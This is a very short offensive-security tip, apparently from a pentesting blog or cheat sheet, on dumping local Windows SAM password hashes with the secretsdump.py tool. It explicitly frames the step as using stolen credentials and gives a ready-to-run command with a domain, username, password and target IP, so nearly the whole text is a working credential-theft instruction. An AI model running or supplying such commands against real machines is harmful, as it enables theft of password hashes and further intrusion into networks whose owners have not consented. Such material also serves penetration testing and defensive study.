Dumping Local SAM hashes with secretsdump.py

Using stolen credentials to dump local SAM hashes is easy with a tool called secretsdump.py

Simply run it against the machine you have access to and it will dump the SAM file:

secretsdump.py pwnme.local/ecartman:Password1@192.168.1.60